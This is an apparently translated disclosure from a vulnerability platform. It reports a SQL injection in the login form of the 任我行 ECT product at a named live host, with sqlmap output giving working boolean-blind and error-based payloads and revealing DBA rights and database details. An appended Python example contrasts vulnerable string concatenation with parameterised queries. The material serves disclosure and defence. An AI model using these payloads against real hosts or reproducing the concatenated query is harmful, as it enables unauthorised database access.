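2015-04-01: Details reported to the vendor; awaiting vendor handling
2015-04-06: Vendor chose to ignore the vulnerability; details opened to third-party security partners
2015-05-31: Details disclosed to core white hats and experts in related fields
2015-06-10: Details disclosed to regular white hats
2015-06-20: Details disclosed to intern white hats
2015-07-05: Details disclosed to the public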
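As the title says.
The login form of 任我行 ECT (an enterprise execution-control tool for "managing people and tasks") has a POST SQL injection, with DBA privileges. Cases: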
http://crm.netzone.com/VerifyUser.asp
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: LoginName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'grasp_crm'
current user is DBA: True
Database: grasp_crm
[290 tables]
Filter the input.
Severity: no impact (ignored by vendor)
Ignored at: 2015-07-05 10:59
Vulnerability Rank: 4 (WooYun rating)
None yet.
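An added example, not part of the original report and not the vendor's code, showing why the LoginName field reported above is injectable and how a bound parameter plus input filtering closes it. SQLite stands in for SQL Server, and the table, column and function names are hypothetical.

```python
import re
import sqlite3

# LoginName value copied from the sqlmap output on this page.
PAGE_PAYLOAD = "admin' AND 6853=6853 AND 'XQMw'='XQMw"

# Hypothetical allow-list for login names; adapt it to the real naming rules.
LOGIN_NAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def make_db():
    """Constructed stand-in table; the real grasp_crm schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_user (login_name TEXT PRIMARY KEY, user_rank INTEGER)")
    db.execute("INSERT INTO login_user VALUES ('admin', 0)")
    return db


def find_user_concat(db, login_name):
    """Vulnerable pattern: the submitted value becomes part of the SQL text."""
    sql = "SELECT login_name FROM login_user WHERE login_name = '" + login_name + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def find_user_param(db, login_name):
    """Hardened pattern: the value is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT login_name FROM login_user WHERE login_name = ?", (login_name,)
    ).fetchone()
    return row[0] if row else None


def is_valid_login_name(login_name):
    """Input filter used as defence in depth in front of the bound query."""
    return LOGIN_NAME_RE.fullmatch(login_name) is not None


if __name__ == "__main__":
    db = make_db()
    # The payload is not an account name, yet the concatenated query returns
    # the admin row: the input changed the structure of the WHERE clause.
    print("concatenated:", find_user_concat(db, PAGE_PAYLOAD))
    print("parameterized:", find_user_param(db, PAGE_PAYLOAD))
    print("passes filter:", is_valid_login_name(PAGE_PAYLOAD))
```

Because the report shows the application's database login running with DBA rights, connecting with a least-privilege account would also limit what such an injection can reach.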